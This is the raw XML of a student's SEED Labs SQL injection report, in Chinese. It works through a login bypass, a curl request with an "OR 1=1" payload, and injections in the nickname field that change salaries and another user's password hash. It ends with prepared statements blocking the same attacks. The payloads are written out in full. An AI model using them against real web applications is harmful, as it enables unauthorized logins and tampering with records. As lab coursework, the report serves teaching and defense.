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Task1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按照实验要求输入指令mysql -u root -pseedubuntu 进入mysql；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依次输入指令 use Users; show tables;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接着输入指令 SELECT * FROM credential WHERE Name='Alice'; ，查询Alice个人信息，得到如下结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="658495"/>
            <wp:effectExtent l="0" t="0" r="825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484" t="71303" r="3472" b="70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如图示，成功查找到Alice。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Task2</w:t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2.1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修改sql内容，通过插入特殊字符#，从而改变sql语句的含义，此时判断密码的部分变成了注释。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我们希望得到的内容是这样的：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SELECT id, name, eid, salary, birth, ssn, address, email,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nickname, Password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credential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WHERE name= 'admin' #' and Password='$hashed_pwd'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输入用户名为：admin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#，此时密码任意填写，就可成功登入管理员账号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4048125" cy="2577465"/>
            <wp:effectExtent l="0" t="0" r="57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6730" t="25337" r="2312" b="2010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left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0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登入后内容如下：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68925" cy="1978660"/>
            <wp:effectExtent l="0" t="0" r="1079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3991" t="24443" r="4657" b="12809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2.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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根据实验和课程讲解，我们初步判断应输入如下指令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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 xml:space="preserve">curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'www.SeedLabSQLInjection.com/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unsafe_home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.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?username=alice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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> OR 1=1 #&amp;Password='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按实验所给提示进行转义操作，得到如下命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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curl 'www.seedlabsqlinjection.com/unsafe_home.php?username=alice%27%20OR%201=1%20%23&amp;Password='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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执行指令得到如下结果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07635" cy="2488565"/>
            <wp:effectExtent l="0" t="0" r="444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3207" t="11056" b="2742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攻击成功。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2.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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在上述两个攻击中，我们仅仅从数据库中拿到了已有的数据，现在我们要做的就通过sql注入插入或者修改数据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。由实验手册的提示我们可以知道，“;”是sql语句的结束符，那么可以在构建sql注入攻击的时候，可以使用“;”将一条语句分割成两条sql语句。由此，我们希望构建如下代码段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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ELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password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FROM credential WHERE name= 'Admin'; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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UPDATE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credential SET salary='0' WHERE name='Admin';#'and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Password='$hashed_pwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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其中插入两个分号之间的是是恶意代码，意在让Admin的薪水变为0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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类似前两步中的操作，我们在username一栏中填入如下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="42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Admin';UPDATE credential SET Salary='0' WHERE name='Admin'#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00700" cy="1882775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4193" t="25380" b="1460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尝试登录，发现攻击失败了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5772150" cy="112014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l="3581" t="25079" r="241" b="4013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分析原因是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为在MySQL机制中update不支持合并两个或多个select语句的union语法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>而是会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>消除重复行，所以攻击失败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Task3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3.1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假设我们此时是Alice，那么我们希望构造出的SQL代码应该是如下的：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UPDATE credential SET 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nickname='',salary='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>114514</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>' where Name='Alice'; # ',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email='$input_email',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address='$input_address',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Password='$hashed_pwd', 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PhoneNumber='$input_phonenumber' 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WHERE ID=$id;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为了达成我们构造的效果，登录Alice，点开个人信息编辑，在nickname一栏中输入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>',Salary='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>14514</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">' where Name='Alice'; #; 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21985" cy="2191385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rcRect l="4509" t="24180" r="4184" b="1065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尝试登录，发现工资确实被修改了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5631815" cy="2159000"/>
            <wp:effectExtent l="0" t="0" r="698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 l="6693" t="25453" b="7880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3.2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本实验中我们尝试更改Boby的工资，类似于上一步，但这一步中，我们要将注入的SQL代码中的name改成Boby。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在nickname一栏填入如下内容：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',salary='1' where Name='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Boby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'#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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627370" cy="2168525"/>
            <wp:effectExtent l="0" t="0" r="1143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rcRect l="4027" t="26247" r="2737" b="6787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32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此时我们登录Boby账号查看，工资被修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5652135" cy="2245360"/>
            <wp:effectExtent l="0" t="0" r="190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l="3967" t="24809" b="4090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3.3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由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了解到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"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文件unsafe edit backend.php会让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们输入的密码经过sha1加密之后将其保存到了数据库的Password字段，由此我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>仿照前两步中的做法，在nickname一栏输入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',Password='XXXX'（密码转化为的哈希值） where Name='Boby'#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我们假定密码为114514，在控制台用指令echo -n '114514' | sha1sum，得到密码哈希值为：2c8509df0df65f9826dc872a9acfea532c1f53c7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510530" cy="558165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rcRect l="3677" t="88003" r="48539" b="296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在nickname一栏输入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',Password='2c8509df0df65f9826dc872a9acfea532c1f53c7' where Name='Boby'#</w:t>
      </w:r>
    </w:p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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5283200" cy="2327910"/>
            <wp:effectExtent l="0" t="0" r="508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rcRect l="4172" t="16944" r="5197" b="8629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32"/>
        </w:rPr>
      </w:pP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然后我们登录boby账号，发现密码变成了114514。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5401310" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="889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rcRect l="8078" t="17574" r="29648" b="26018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32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>哼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>哼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>哼，啊啊啊啊啊啊啊啊啊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，啊啊啊啊啊啊啊。野兽先辈Boby说（不是）</w:t>
      </w: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eastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="18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Task4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Task4: Countermeasure — Prepared Statement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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用SQL预处理对查询语句进行处理，防止SQL注入的产生，尝试一下原来的payload，已经打不通了。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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过预处理划开查询语句的和用户输入，导致用户输入不能逃逸成为查询语句的一部分，实现对SQL注入的防止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如图，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击失败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0" distR="0">
            <wp:extent cx="5300345" cy="1247775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 t="25849" r="-494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32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p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  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"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B540F9"/>
    <w:rsid w:val="14DE1C61"/>
    <w:rsid w:val="1F007C87"/>
    <w:rsid w:val="2A7A413C"/>
    <w:rsid w:val="34AC62FE"/>
    <w:rsid w:val="5D5B2940"/>
    <w:rsid w:val="602E4BEA"/>
    <w:rsid w:val="683A5CB3"/>
    <w:rsid w:val="6FB540F9"/>
    <w:rsid w:val="75110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2020-09-17T06:48:00Z</dcterms:created>
  <dc:creator>23129</dc:creator>
  <cp:lastModifiedBy>23129</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-21T05:14:25Z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